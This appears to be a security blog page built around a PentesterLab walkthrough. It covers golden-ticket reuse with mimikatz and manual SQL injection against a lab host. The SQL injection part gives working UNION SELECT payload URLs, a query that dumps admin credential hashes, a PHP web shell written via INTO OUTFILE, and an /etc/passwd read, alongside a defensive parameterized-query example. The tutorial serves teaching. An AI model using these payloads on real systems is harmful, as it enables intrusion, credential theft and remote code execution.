buf="\x6a\x0a\x5e\x31\xdb Cyber Security Rants, w00t!"
Monday, January 1, 2018
Windows Credential Attack - Part 3
In parts 1 and 2, I wrote about passing the hash (PtH) and passing the ticket (PtT). This time, I will demonstrate how an attacker can still reuse a golden ticket even if you set up a second DC (Domain Controller). It is common for admins to have more than one DC as a backup; in the event the primary is compromised, the BDC (Backup DC) is promoted to PDC. The assumption is that this will remove the golden ticket. Unfortunately, that assumption is not right, since the BDC auto-syncs the AD objects and the KDC from the PDC. In effect, the BDC inherits the KRBTGT from the primary, and thus the golden ticket is transferred over. The video demo below illustrates how this happens seamlessly when a BDC is promoted to PDC. We execute mimikatz on the BDC, dump the LM hashes and reuse the KRBTGT ticket to gain psexec rights on another client PC that is authenticated to the same domain controller.
SQL Injection Walkthru (SQLi)
Most SQLi attacks are done using some form of 'hacker' tool; the common ones are sqlmap, sqlninja, bbqsql, etc. While using such tools is important, one must not forget the fundamentals of SQLi. In this post, I will demo the steps of identifying, enumerating and executing code on the victim server 192.168.52.141. The victim server is running a typical MySQL with PHP setup.
Identifying SQLi
Often we start by inserting a ' in any user input field we can find. If we are lucky, the server will display some errors, which means we have broken the SQL statement used to display the results.
The above diagram displays an SQL error showing 2 single quotes, even though we added only 1. This usually means there is already a single quote used in the statement; a peek at the backend code looks like:
On line 16, the variables id and title are already wrapped in single quotes, which means that if you add another single quote, the statement is broken. This is unusual, as most SQLi attacks start with a single quote followed by the payload. So always pay attention to the error message. If you want to know whether ' is required or not, first try a logical expression such as id=2-1: if you don't see an error and the returned display is id=1, you know that SQLi is possible without the single quote mark ;-)
Let's proceed with enumeration of the SQL table.
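As an added illustration (not code from the post or from PentesterLab), here are the page's two probes, a stray ' and the arithmetic 2-1, run against an in-memory SQLite stand-in for the cat.php query, once with the parameter spliced into the SQL text (the unquoted variant the 2-1 test is designed to reveal) and once bound as a parameter. The table, its rows and the function names are constructed for the example; SQLite is assumed only because it ships with Python.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the photoblog categories table (example only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO categories VALUES (?, ?)",
                    [(1, "first"), (2, "second"), (3, "third")])
    return con

def category_vulnerable(con, user_id: str):
    """String interpolation, as in the post's cat.php backend: the raw parameter
    becomes part of the SQL text, so 2-1 is evaluated by the database engine
    and a stray quote breaks the statement (the page's two tell-tale signs)."""
    sql = f"SELECT id, title FROM categories WHERE id={user_id}"
    return con.execute(sql).fetchone()

def category_parameterized(con, user_id: str):
    """Bound parameter: the value is compared as data and never parsed as SQL,
    so neither probe gives the attacker a signal."""
    sql = "SELECT id, title FROM categories WHERE id=?"
    return con.execute(sql, (user_id,)).fetchone()

def probe(handler, con, value: str):
    """What the manual probe observes: the returned row, or 'error'."""
    try:
        return handler(con, value)
    except sqlite3.OperationalError:
        return "error"

if __name__ == "__main__":
    for handler in (category_vulnerable, category_parameterized):
        for value in ("2", "2-1", "2'"):
            print(handler.__name__, repr(value), "->", probe(handler, make_db(), value))
```

With interpolation, id=2-1 returns the row with id 1 and id=2' errors out; with a bound parameter both simply return no row.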
Enumerate SQLi
This is where we must first find out how many columns are in play; we can do this with the UNION SELECT statement, as the number of columns we select must match the number in the query the page uses. If you use sqlmap, this is what it automates for you :-)
So, by inserting the following statements:
http://192.168.52.141/cat.php?id=2 union select 1
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3,4
no error returned; see diagram below:
Code Exec
Now we can start rocking! Let's see what version, database and user MySQL is running. We can call MySQL built-in functions such as @@version, database() and current_user().
Looks like it's running Debian Squeeze. Now let's see the name of the database the contents are stored in:
Great! The db name is photoblog. Now, how about the user id mysqld is running as:
From here, we already have code execution. The next step would be to exfiltrate the contents of the database 'photoblog'. There are some default tables in MySQL, such as information_schema.tables and information_schema.columns, that contain very useful information:
http://192.168.52.141/cat.php?id=2 union select 1,table_name,3,4 from information_schema.tables
will return the complete set of tables in the photoblog db:
The table 'users' is of particular interest to us :-) Let's see what we can find inside it by displaying the corresponding table_name:column_name pair for each row using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(table_name,':',column_name),3,4 from information_schema.columns
Output:
Scrolling down the displayed output, the most obvious goodies are inside the 'users' table, columns 'login' and 'password'. Let's exfiltrate them using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(login,':',password),3,4 from users
Output:
Now we have exfiltrated the user 'admin' with password '8efe310f9ab3efeae8d410a8e0166eb2'. Stick it inside your favourite password cracker and go for the admin password!
There you go folks... tools such as sqlmap can also spawn a shell. What they do is write a php file to the www root with a simple php system call, such as:
http://192.168.52.141/cat.php?id=2 union select 1,"<? system($_GET["cmd"]); ?>",3,4 INTO OUTFILE '/var/www/cmd.php'
Provided the user 'pentesterlab@localhost' has the privilege to write to /var/www/, you should be able to call the URL directly and pass arguments. You can also try load_file('/etc/passwd'); if you are lucky, you will be able to see its contents.
That's pretty much how SQLi is done by hand. Remember, don't be a script kiddie: always understand how your code works!
Kudos to www.pentesterlab.com for the educational content.